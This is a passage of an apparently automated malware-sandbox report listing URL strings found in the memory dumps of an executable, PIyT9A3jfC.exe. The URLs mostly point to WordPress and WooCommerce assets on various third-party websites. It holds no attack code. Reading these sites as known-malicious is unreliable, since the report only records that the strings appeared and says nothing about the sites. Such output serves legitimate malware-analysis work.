                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/css/classic-themes.min.css?ver=6.2.2
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/css/dist/block-library/style.min.css?ver=6.2.2
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/dist/hooks.min.js?ver=4169d3cf8e8d95a3d6d5
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/dist/i18n.min.js?ver=9e794f35a71bb98672ae
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.11
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.4
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/wlwmanifest.xml
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702946761.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.676941396.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.688055469.0000000007692000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.652210236.0000000007698000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714343191.0000000007702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.crcsi.org/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702946761.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714343191.0000000007702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.crcsi.org/DH
                  Source: PIyT9A3jfC.exe, 00000001.00000003.805219549.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.778285046.0000000007701000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.crcsi.org/VHN
                  Source: PIyT9A3jfC.exe, 00000001.00000003.805219549.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.778285046.0000000007701000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.crcsi.org/YHG
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702946761.0000000007702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.credo.edu.pl/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.crrcgc.cc/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.676941396.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.699360382.00000000013F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dayvo.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702889858.000000000138A000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.depalo.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.584136385.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714343191.0000000007702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dgmna.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.699360382.000000000142A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dgmna.com/.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.584136385.00000000013F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dgmna.com/CH
                  Source: PIyT9A3jfC.exe, 00000001.00000003.584136385.00000000013F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dgmna.com/_H1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.804950474.0000000001423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.domon.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.domon.com//
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702274857.0000000001423000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709131137.0000000001423000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.699360382.0000000001423000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.676941396.0000000001423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.domon.com/4
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702274857.0000000001423000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709131137.0000000001423000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.699360382.0000000001423000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.676941396.0000000001423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.domon.com/w
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.00000000013DC000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.699360382.000000000142A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.edimart.hu/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709131137.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.754527325.0000000001438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.edimart.hu/S
                  Source: PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.edimart.hu/T
                  Source: PIyT9A3jfC.exe, 00000001.00000003.699360382.000000000142A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.edimart.hu/j1
                  Source: PIyT9A3jfC.exe, 00000001.00000002.894106313.0000000007715000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702107735.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702946761.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.652259211.000000000143F000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714343191.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.778285046.0000000007701000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702946761.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.805219549.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714343191.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.778285046.0000000007701000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/&v
                  Source: PIyT9A3jfC.exe, 00000001.00000002.894106313.0000000007715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si//Hu
                  Source: PIyT9A3jfC.exe, 00000001.00000003.652259211.000000000143F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/m
                  Source: PIyT9A3jfC.exe, 00000001.00000003.652259211.000000000143F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-co
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/ajax-search-for-woocommerce-premium/assets/css/style.min.css?
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/ajax-search-for-woocommerce-premium/assets/js/search.min.js?v
